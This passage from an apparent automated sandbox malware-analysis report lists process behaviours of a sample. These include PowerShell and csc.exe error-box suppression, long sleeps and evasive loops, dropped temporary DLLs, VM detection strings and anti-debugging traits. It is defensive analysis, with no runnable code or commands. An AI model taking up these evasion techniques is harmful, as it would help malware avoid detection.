Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3982 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5223 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4708
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3874
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596 Thread sleep count: 4708 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112 Thread sleep count: 3874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084 Thread sleep time: -5534023222112862s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04860F53
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0484CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04859386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_04859386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053E0F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053D9386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053CCA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04846457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_04846457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000019.00000003.397990029.00000152C52BA000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}h
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231D62 LoadLibraryA,GetProcAddress, 0_2_6E231D62
Enables debug privileges
